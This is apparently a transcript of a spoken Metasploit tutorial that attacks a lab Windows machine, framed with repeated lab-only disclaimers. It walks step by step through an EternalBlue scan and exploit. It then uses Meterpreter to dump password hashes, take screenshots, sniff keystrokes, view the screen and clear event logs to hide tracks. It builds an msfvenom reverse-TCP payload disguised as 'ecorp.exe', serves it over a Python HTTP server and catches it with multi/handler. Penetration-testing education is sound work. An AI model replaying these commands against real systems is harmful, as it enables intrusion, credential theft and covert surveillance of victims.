Hello everyone, welcome back to my channel. Uh, uh, Today we're going to talk about Metasploit. Okay. Before we start, I think we should mention. I should mention that this is actually only for a disclaimer. Like this is only for it's intended for learning purpose, for educational purpose. So if you are planning to do any testing or doing penetration testing, I suggest you do it in your own lab. Like you can set up on your own setup, okay, and don't try this on any other network, okay, without permission. That's what I want to say, because yeah, don't try this at يعني, don't try to do this on any other network or any other system that's not yours. يعني. Try to do it only on your environment. Like I said before, the previous session, we use Metasploitable, right? It's a vulnerable uh, it's a vulnerable OS designed for testing. Okay, intentionally they made it vulnerable so we can test, we can practice penetration testing on it. Okay, and we will use also Metasploitable 3, which is the latest version of Metasploitable, and which is vulnerable, which will allow us to test many things more than Metasploitable 2. So I suggest you go ahead and download Metasploitable 3, okay, and do testing on here. And again, this is whatever I will teach today, it's only for educational purpose, okay, and don't try to do any of this on another network or another system that you don't have permission to do. Like always get permission before doing this. Okay, so let's start first. Let me show you how I installed this one. Metasploitable 3 is actually a little bit complicated to install. Okay, you have to follow, but there is one guide here I'm following to install this one. I will put this link in the description so you can go ahead and download it. Go ahead and try it out. Okay, see how it's being installed, how to install it. So this Metasploitable 3 for VMware, this is the link. It will give you a detailed way on how to install this one. Okay. Yeah. Okay. Then move on to the commands with the Kali Linux, and let's go ahead and open Kali Linux. Let's see if it's yeah, this is Kali Linux. So we're going to start with the Metasploit. So Metasploit is a framework, okay, is a penetration testing platform. Okay, it's used to test security defenses, validate vulnerabilities, simulate real-world attacks with authorization. Okay, it's a modular system, meaning everything's broken into parts. Okay, we have exploits, payloads, auxiliary modules, post-exploitation. Metasploit itself does not hack automatically. It helps test known weaknesses. Okay, what we need to know about Metasploit is like a command center. Think of it like a command center. Okay, that has all the exploits, the payloads for you in one place, so that you can attack other systems, vulnerable systems. Okay, and see it in a single in a central console. Like, to start Metasploit, this is the command that we need to do: msf console console. Okay, and Kali Linux, it's already pre-installed, but you need to update actually the apt-get update. Use that to update the version. So click enter. Okay, this is Metasploited framework. It comes pre-installed with Kali Linux. So this is the version. These are the number of exploits we have, number of posts, number of auxiliary, payloads, encoder, evasion. All this we'll discuss it. We'll discuss each and what it means. So MSF console is a Metasploit main interface. Conceptually, it lets you search modules, configure options, launch exploits, manage sessions. Think of it as a command center, not a single exploit. Okay. So yeah, what's the difference between exploits and auxiliary modules? Exploits, the purpose is to trigger vulnerability. Okay. The goal is to gain execution or access. So we have categories here: buffer overflow, service, whatever. If exploit succeeds, payload runs. Okay. Triggers a vulnerability. Auxiliary do not exploit, used for scanning, enumeration, brute force testing, and service detection, like port scanning, SMB version detection, login checker. Basically, auxiliary modules are only for information gathering and validation, while exploit module is used for exploiting. Okay, so payload is a code that executes after an exploit works. Okay, understand this. Okay, payload can execute only after exploit works. Exploit triggers the vulnerability. There is a vulnerability in the system. First thing we'll do, we'll exploit it, and then send the payload. Okay, exploit is a delivery method. Payload is the result. Okay, common payload goal is open a shell, create a remote session, collect information. So we have payload type single, op one piece, simple limited. We have stager, small initial loader. We have stage, larger functionality delivered after stager. Metasploit is a staged payload. Meterpreter is a stage payload. Okay, and let's say we have, what's the difference between L host? L means local host. Okay, this is local port. That means, for example, let's say yeah, this is the attacker listener IP. This is the attacker listener port. Okay, like the IP of the Kali Linux that we are going to use is going to be in localhost, and the port is going to be here. Used mainly for reverse shell. Target connects back. Yeah, we need to set this one so that only for mainly for reverse shells. Reverse shell is like when you connect to target wants to connect back, so it's going to use your L host, right? So you have to make sure the L host is actually your local IP. And we have multi-handler, which is a listener. Okay, multi-handler is a listener. It's not an exploit. It's not a scanner. It's a listener. Listener means you just set up the local host and the local port here, and you set up the payload and you click exploit. Once you exploit it, it's just going to listen. It's not going to do anything. Okay, it waits for a payload to connect back. So when you send the payload to the victim machine, the victim clicks it or runs it, it will automatically connect back to this listener, because that payload, actually in that payload we are setting the local host and L port as well, so that it knows where to connect back. So basically I already delivered the payload, now I'm waiting. Okay, Meterpreter, it's an advanced memory resident payload. Okay, runs in memory, no file on disk, encrypted communication, modular, stealth than basic shell. It's popular because it allows post-exploitation testing. Okay, it runs on memory. Meterpreter, and it's used only after you exploit. You can run this after you get you exploit it will open for you once the exploit is successful. It's going to open for you a Metasploit session. That means you've got access to the victim's machine, right? So you can there are many built-in commands for Metasploit. Okay, like it can allow you to session manage for file system access. You can access the file system of the victim, process interaction, privilege escalation, check, credential extraction. You can take the credentials, dump it on your PC, network pivoting. Okay, so shell is a basic command execution process. Shell, we have two types of shell: bind shell, target opens a port. Reverse shell, we already said that target connects back. Okay, it's two different things. Okay, shells are noisy, limited, easier to detect. Metasploit is far more advanced than basic shell. Encoders and how effective they are today. Encoders modify payload appearance to evade simple signature based detection, bypass bad character restriction. So encoders are just, what they're doing is like they're hiding your payload. They're manipulating the signature, the code of your payload, so that it makes it hard for antivirus or firewalls to detect. Okay, it's just modifying the payload appearance. Okay, but in reality, in modern security, encoders are mostly ineffective today. Okay, like antiviruses use behavior analysis, memory inspection, heuristic, machine learning. Encoders do not equal encryption. Privilege escalation, you just need to understand that privilege escalation is when we go from low access to higher access. Like for example, I have a user John and I have a user administrator. Okay, so if I have a user John, I'm just going to have a limited access, right? I'm not going to be able to do many things. But if I have user administrator, I will own the system. Okay, so it's a way to move John to become an admin. That's basically what it means. Usually relies on misconfiguration, outdated kernel, weak permission, vulnerable services. Metasploit can detect escalation path, test known vulnerability, and persistent, maintain access after reboot and log off. Persistent means, like, let's say you send the payload to the victim PC. Okay, you run it. Okay, you have access now. You get the Metasploit session, and you can do whatever you want on the PC. But what if the victim's PC restarted, or he shut it down, or something? You will not be able to access it again. You have to go through the whole process again. Okay, you have to transfer the payload to the victim machine, and the victim, you have to make sure the victim clicks the payload, and so on. But instead you can do one thing. Once you have access the first time, okay, you can make it persist. Like, you can add it on a startup task. That means if you put it here, that means whenever the PC restarts, it's going to run automatically the payload. Or you can put it if you find service misconfiguration, you can put it there. Any path with service with the permissions, or with the unquoted space, you can just play with the paths, right? Add it there. Or you can schedule it. You can schedule it to run. You can use scheduled tasks to run every some time. So in professional testing, persistence is carefully controlled, often avoided unless explicitly approved. Okay, so it allows you to maintain access after reboot. Okay, then search exploit. This search exploit DB locally. Okay, search exploit is just a command that searches exploit DB locally. The purpose is to map known exploits to detected software. Research vulnerability does not automatically attack, it helps in research. Like, it helps us learn more about the vulnerability. Okay, like public vulnerability research sites include ExploitDB, vendor adversaries, CVE, database, scaling mask, used by attacker, defender, security, by anyone basically. Knowing exploits helps defender patch faster. Okay, just so I can show you what exactly is we're talking about, it's actually this one. This is what I'm talking about. This is the website, exploitdb.com. Okay, basically this is a search. You just type something here, it's going to find for you all the exploits that it knows. If I write here SMB, for example, okay, and click enter, it's going to list for me all the known attacks for SMB, through SMB. I can write anything here, like VSPT, VSFTPD, FTP, FTP, and yeah, basically that's the idea. It will allow me to like search the vulnerabilities from here. You have the hardware type. You have, let's say we check what's the hardware type. We have the type here, is it DOS, local, remote, hardware, port, if you have specific port like 21, FTP. That one is not yeah, we have here the tags like authentication. So basically that's what exploitdb is. Okay, and this command you have to learn it because it's actually very useful. Python 3 http://server 8000. This actually will let me transfer payloads from the attacker's PC to the victim PC if they are on the same network. Okay, so you just open an HTTP server at this port. Okay, and you can easily transfer the payload to the victim PC. I will show you how it's done. Okay, it starts a temporary HTTP server, shares files locally. It will help us in our labs. Okay, so Netcat is another important thing. It's a network manipulation tool. Netcat actually, it's just a tool that allows you to open a listener. Okay, and yeah, it will allow you to open a reverse shell. Okay, so let's go ahead and start actually playing with Kali Linux here. Okay, we already opened the Metasploit here, so I'm going to take it slow. Okay, like I'm going to show you what we learned until now. Okay, with practical. So I'm right now and I'm in Metasploit, right? Let me clear this one. If it's possible to clear. Yeah, cleared. So what I need to know, what I need to do is 1 second. Let me enter full screen mode here. Okay. So first thing we can do, like we can check show payloads or exploits here. Okay, these are all the exploits that are available in Metasploit. It's giving you the exploit name. The name is actually important for us. Okay, and the date, the status here, and let's go up and see what. Yeah, we have the name here, disclosure, when it was disclosed, the rank, check, and this is the description of the exploit. Okay, and but let's say you said like how can you like you don't have to do this and go through one by one, right? There is a command that will make it easy for you to filter properly. Let me clear this. Okay, so you can just type search, for example, here, and type the exploit type. Okay, let's say I'm going to search for I want to know eternal blue exploit. This is it. All I have to do is just this. It will list for me all the exploits for eternal blue. You can find it here, you can find it here, and these are the exploits, right? No, but if I don't specify whether I want to search for auxiliary or exploits, because there are two different things. Auxiliary is just to scan, right? To enumerate scanning and stuff. It doesn't exploit, but exploit is separate. So there is also one way. Let's say you want to specify the type. You can just search type here. You can say I only want exploits. I don't want auxiliaries. Exploits here, okay, and I can just exploits and name. I can just type here the eternal blue. No result because there is no S actually here. So as you can see now, I was able to get only the 2 exploits, okay, without the auxiliary. Okay, so this is one way to search, and there is one more. You can just search exploit. This command is actually helpful for searching. You can just type here eternal blue. Yeah, this is actually much better. See, I just type here search exploit eternal blue. It's listed for me all the exploits related to eternal blue. Okay, yeah, so this is one way of identifying the exploits as well. You can use search exploit. Okay, let's see. Okay, we said we have 2 types of modules, right? Exploits and auxiliary. Auxiliary is like search auxiliary or show auxiliary. You can also go show auxiliary. Yeah, so this is all the auxiliaries scanners. You see this one, this scans the telnet version, and this scans the SMB. Here we have SMB, and this just scans whether the specific PC is used. Auxiliary is just for scanning and enumeration, not exploits. And we have one more, show payloads. These are all the payloads that are available. Okay, but mostly we're going to only be using like this one payload, this Metasploit reverse TCP payload actually. But just so you know that there are many payloads types here. Okay, the one that will be used is we're going to use mostly is here, this one, show search. Let's say if we can search payloads as well, payloads, and name reverse. I just want to TCP. Let's see if it will shortlist. No, reverse TCP reverse. This is the one that we're going to use. Search. I will type it for you here, the full payload, so we can know what it is. Metasploit and reverse underscore TCP. I think I'm missing something here. Yeah, it's just S. So this is the one that we're going to use mostly. This payload, Windows Metasploit reverse TCP. Okay, without anything else. Reverse TCP. So this one we're going to use. Okay, clear this one, and we've seen the payloads and we've seen the payload. Now let's go ahead and search for let me go ahead and search for to check. I want to see if this PC is vulnerable to eternal blue attack. This one. How can I do that? I just have to check this IP. You can scan it from that your Kali Linux as well. But yeah, let's use auxiliary. Search, type auxiliary, and name is going to be yeah, eternal blue. Put space because actually yeah. So we have only one here. Okay, this is just a tool that will allow you to check if I think it's just a way, so it will check if the PC is vulnerable to this exploit or no. Okay, so I want to use it so that I can see. So just to use any exploit or auxiliary, like all you have to do is just take this one, the name, copy this one, okay, and after use just paste it here. Okay, and now let's see what are the options available. Type show options. Okay, these are the options that are available, but usually we just we'll see what are required here and what are not required. Okay, we ignore what's not required. Also, what are required already is filled by default, so leave it. But the main thing that we need to focus is on our hosts, our port, and if there is L host, L port in the payload. This stuff is we should focus on. But right now we just want to try our host. Okay, our host means remote host, the victim's PC. So I'm going to set our host here, and I'm going to set it with the victim's IP, which is this one. And all I have to do now is just exploit or run. Will do also same. You can type exploit or run, it will work. Okay. Name pipe auxiliary. No, actually this is not the one that we need. We need the scanner, I guess. 1 second. Let's just search. Search eternal blue. This is the one that we need. Actually, we're using the wrong exploit. This is the one we need. The scanner. It's going to scan to check whether this PC is vulnerable to eternal blue or no. So I'm just going to type use here. I'm just going to put this file full screen, and I'm going to type use here and paste this one. Show options. Okay, so here just let's clear this. No, let's just type the set our hosts 192.168.255.137. This is the victim's PC, and there's nothing more we need to do here. Just run this one. It's telling you host is likely vulnerable to MS17.010 Windows Server, so it's vulnerable. Yeah, so now we know that it's vulnerable to this exploit, Eternal Blue. So now let's go ahead and exploit it. Exit. No, MSF let's clear this one first. MSF console. So now I'm just going to search for eternal blue, and I found that. Let's go ahead and use this exploit. This is the exploit that we can use. Okay, just copy this one. Now clear this one and use this command. And the same thing we will do. We just type show options. You see here it's telling you no payload configure, so it's defaulting to this one, which is the default. Yeah, so here we have our host, our port, SMB path. So you just need to focus on our host. You just need to add our host, the target host. Okay, and you have to make sure, this is very important, if you have to change the local host. Okay, because it will not actually work. Here in the payload, you can change, because here it's saying local host. This is the IP that's supposed to listen, right? But in order for the payload to come and connect back to this listener, it has to know its IP. Okay, you have to change the L host as well. Put it the IP of this machine. Let's go ahead and set our host first. Our host 192.168.245.137. Set lhost. I don't know what's the IP actually. Let's go ahead and check what's our IP. Let's go ahead and check the IP here. ifconfig. So my IP is this one, 32. So let's go ahead here. lhost 192.168.245.132. So now I can just type exploit here. It's going to exploit the PC. Again, please only try this at your lab. It's only for educational purpose. Don't try this without any permission. And now I just clicked exploit, and I'm going to get the Metasploit session. Let's open this one. It will take time, just give it some time. And in order to do this, you have to be the same network as the victim. And note this exploit Eternal Blue is actually patched now. You will not find it. You'll find it only on old vulnerable Windows 7 PCs, like legacy PCs. The latest versions of Windows already patched this one. Okay. Yeah, and disabled SMP version 1 by default. So give it some time. It's taking long. Let me just verify that Windows is on. The IP is working. Yeah, it seems to be working. Let me see why it's taking too much time. Shouldn't take this much time actually. Should have opened the Metasploit session for me. Let me check the network if it's on the same network or no. Host only, which is the same. Host only, also same. So what is the issue? Let me check. Let me go back. Triggering free corrupted, connecting to target exploitation. No session created. So let me just go ahead and check. Show options here. Options. I put this one lhost, and I put this one rhost. So let me just specify the I don't think that will affect, but let's go ahead and try it. Set payloads. I think this one we skipped. Windows printer we have reverse underscore TCP unknown data store payloads. Okay, let's just use payload without yeah. So let's just exploit now. Let's see what happens. Is not a compatible payload. I think the payload is not the right payload. But let's go ahead and try it. Try this one. Let me see what mistake. Maybe I'm reverse underscore TCP Metasploit x64 Windows. Yeah, I'm actually using the right payload here. Anyhow, it should have worked without even specifying the payload. But let's go ahead and do it again. Okay, let's just do it again, just to make sure why it's not working. Exit here. Let's clear this one. Maybe it might be the port MSF console. Maybe there is another session that's open, because I tried this one also on the previous session. So just to guarantee that it will work, let's restart the guest here. Restart this one. Okay, and let's restart this one also. Okay, I have config. My IP is 132, same like before. Let's go to MSF console. Yeah, give it some time so it will restart, but I think we are going to use search internal loop. I'm going to use this one, which is the one that we're supposed to use. Use this one, paste. Okay, clear this one, and we're going to set our hosts. I'm going to assume that our host is going to be the same, so I'm going to type 245 and 137. Let's check it though. Give it some time so it will restart. See how much time we have. Oh, already 41 minutes. So okay, the server is on actually. We're going to try now. Okay, let's see. IP config IP config. Yeah, it's the same IP, so I'm just going to go to Kali Linux and set the R host, and I have to set the L host as well. L host, set L host, and the L host is going to be 192.168.245.132. exploit. Done. So just open for me a Metasploit session here. Let me increase the session here. If you get this one, that means you're inside the PC. Then you hack the PC successfully. So this is Metasploit session. So let's go ahead and type help if it's going to do that one. Yeah, so I just typed help command so we can go through each Metasploit command. So what are the commands that are available? So background means we are going to background the current session. So right now we are inside Metasploit, right? So we can put it in the background. BG is alias for background. BG kill kills the background Metasploit. BG list of background scripts. And what else we have here important? Sessions, quickly switch to another session. You type session, let's say you have multiple Metasploit sessions, you can just use session to switch from between them. Get system command here is actually used to elevate attempts to elevate your privilege to that of a local system. Okay, this command is used to escalate your privilege. Get system, and just go down. What we have after? Let's just go down here. And we have after get system. Yeah, this hash dumps the content of some database. You know, some where username and password or credentials are stored actually inside some database in the window, right? You can use hash dump to dump the content of some. Timestamp manipulates. This one is not important. File system command, we have cat cd. This is you know about it. Download is important. It downloads a file or directory from the Windows to your PC. Okay, this is important. And we have upload here also. This is used to upload anything from your PC to the victim's PC. Okay, this is important. And we have this command clear AV. This clears the event log of the victim. So to hide your tracks, you can use clear AV command. And what we have here, get privs, attempt to enable all privileges available to the current process. And we have kill still sysinfo, gets information about the remote system such as OS and stuff. We have this one, keyboard sends keystroke, and keyboard key scan dumps keystroke buffers. You can key scan starts capturing keystrokes, like whatever you type there will show here. Screenshot, take screenshot of the desktop. Webcam, you can record a microphone, record audio with default microphone. Chat, start a video chat or stuff. Snapshot here, and play, you can play an audio or something. So these are the key commands that we need to do. But now let's do get sysinfo, just to make sure. Do you mean sysinfo? Yes, just sysinfo, just to make sure that we're actually inside the PC. You see this one, background 288 Windows Server. That is actually our PC. Okay, there's a command also, shell here. If I want to go inside here, the shell, and yeah. Let's click exit here. Yeah, I got into the shell, and yeah. So let's try to do hash dump to the Windows. Yeah, see, it's giving me the hash and the dump. The hash, this is the hash. Okay, all this from the Windows. It's dumping the some folder. So what I will do from my side is just copy this one, Control C, and open here Nano, and you can put it inside your copy it for your later use. Like, you can keep it here if you want to open another session here, and type nano hash win server .txt or something, and Control V. You can just paste it here, paste clipboard, and yes, so save it here. So I just saved it on here, the hash, and once you're inside, there are many post-exploitation tools. You can try screenshot. Let's try screenshot here. Screenshot. Yeah, it saved the screenshot under Kali, under this one. We'll copy this one, and cd ls ls. Yeah, ls cd Kali, and ls screenshot is actually here. This is the screenshot. So let's open this one. Open folder. I'm going to go to check the screenshot here. This is the screenshot. See, this is our window, the Windows screenshot we just got from Metasploitable screenshot. And what more we can do? Let's do key dump, key scan, start. It's actually start, I think. Starting keystroke sniffer. I think it's not going to show you here, but let's go ahead and do something here. Hello world or something. Let's go ahead and try here. Let's go key scan. Let's see if key scan stop. So there is a command that will help you with the key scan, stop. Help here. Let's go back to the help to see exactly what are the stored here. We have key scan store, key scan send, and keystrokes. Get desktop, key scan dump. Let's see key scan dump command. Let's try this one. Key scan dump. Operation failed, incorrect function. Keyboard dump, key scan dump, correct. And mouse screen share, user in real time. Let's see screen share command. This actually is interesting. See what you can do. Yeah, it just opened for me the victim's PC on my own browser. I can see what the user is doing. Okay, but keep in mind that I cannot do anything. I can just see what the user is actually doing. Let me put it into separate. Let me put it in a separate VM and see what. Yeah, now it's in a separate VM, right? So let's see what we can do to verify that it's actually working. Let me just change the. You see this one? Anything I do here, it's going to be. I can see, the hacker can see. Is one thing. This command is actually pretty interesting, and yeah. So let's see what else we can do. Webcam. I don't think it has a camera, so it will not work. But you can use it. And set desktop. Control some interface. Get desktop. Get the current Metasploit desktop. List all accessible desktop and Windows stations. Enum desktops. Let's see what it means. Enum desktops. Desktops. Gave you this one. Not that much interesting. Clear AV will destroy our timestamp. Get system, we got this, we did this. Yeah, basically that's what we can do here. And we can upload any command, we can send it here, and we can transfer any command here. This is what we can do with Metasploit. Okay, and we will learn more about this post-exploitation, like privilege escalation and the persistent, on the next session. Yeah, today's session, the goal was just to learn how to use Metasploit to exploit another PC. So now let's go ahead and do it in another way. Okay, let's just close this one. Let's just close this. I'm going to close this now. Exit. Yeah, exit this as well. So there's no need to use console now. We're just going to focus on MSF Venom. Okay, MSF Venom is actually just another tool. It's a tool that's used to create a payload, okay, and transfer it to the victim's, and so it will open a listener also. Let me show you how it works. Windows. First, I'm going to define the payload. Metasploit. interpreter reverse underscore TCP lhost equals to 192.168.245.132 lport. We can choose here, let's choose 8888, okay, and F, going to make it XC, it's the extension of the payload, and going to pipe it, and the name is going to be malicious or name it like something like ecorp dot exe. So just to review what we did here, I just defined the payload here, okay, and I just defined the local host here, which is my PC, and I defined the port here, can be anything. F is just the extension I need it to be, like .exe, and then I'm just going to define the name in .exe. Click yes, enter. Done. So right now if you click here ls, you're going to find the ecorp.exe here. You see this one? This is the one, ecorp.exe. Okay, so I think, yeah, ecorp.exe. Let's see, ls minus la ecorp.exe. Yeah, I think it's not executable, so let's make it executable here. Change mode plus x ecorp.exe. So now it's executable. So now your question should be like, how can I send it to the victim's PC? This is the best, easiest way right now. Python, you just type python 3-m http server, and you type anything here, like whatever you like, any port. Okay, just click enter. This what's going to do is it's going to open a temporary HTTP HTTP page, okay, for this path, for this folder. Okay, so now Windows should have, if you go back to the victim's PC now, okay, you should be able to access this one. But before that, we need to do one more thing. We need to open a listener. Okay, yeah, a listener. So to do that, we have to go to MSF console again. We have something called multi-handler. Okay, we can just search here multi-handler. Okay, this is the one actually, and use multi-handler. So show options. So yeah, is here you're just supposed to enter the local host, and also you have to enter the port. You have to change the port. It's not 444. We defined on the payload that the payload that we're going to send it to the victim. We mentioned the port is going to be 8888, right? So it has to be the same actually. It has to be the same port. Local host is your own PC's PC, yeah. And yeah. So let's first set the payload. I think we should set also the payload. Payload should be Windows Metasploit dash reverse underscore TCP. Okay, and now set our host. No, I'm going to set the L host actually. Sorry, L host 192.168.245.132, and I'm going to set the L port. The L port 8.8.8.8. No, it's not that one. It's 8.8.8. Yeah. So now I'm just going to exploit or run. Either way it will work. Yeah. So now we are going to do? We're going to open it side by side. Okay. So and let's put this one here. Yeah, go to the PC, open Explorer, and just go to your home page. Okay, and here I'm just going to type HTTP. This one, 245.132, which is my IP, and 888. No, this is actually for the server we're trying to download, right? And here I'm going to type ecorp.exe. Let's click enter. Yeah, see, it worked. You can run it from here. If you go back to here, you can see also here this is the HTTP server that we opened. Here you see this one. Yeah. So right now I'm just going to run this one and run it. So once I run it on the victim's PC, once I run the payload on the victim's PC, it's going to open for me a Metasploit session here. That means خلاص, I got access to the PC, the victim's PC. Okay, this is the listener. So basically that's the key points that we need to understand. So there's one more thing about encoders. Actually, encoders you can add, like when I created this payload, I didn't use any encoder. Okay, I didn't use any encoder, and the reason is, as we discussed in the session, it doesn't really hide anything. Okay, it's not effective. So I can just go here, MSF Venom. If I wanted to put an encoder, all I have to do is just go here, P, and Windows Metasploit reverse TCP localhost. Before localhost, you can just add here E that represents the encoder actually, and let's see if it will give me. No, let me show you the type of encoders we have. Maybe it will. No, it will not allow me here. Let's see if I type show encoders. It's not going to show me here. It's not going to list here, but let me go to Google so I can show you what's the best encoder. There is one encoder called Shikati Guy. You can add it there. But again, yeah, that's something that it's not going to actually make a big difference in terms of hiding the payload from antiviruses. It's going to be detected because the modern antivirus is actually more secure. There is also another tool called Veil. Again, this is also same, yeah. And These tools are not as effective as much as you think they are. So I'm going to open for you the encoders.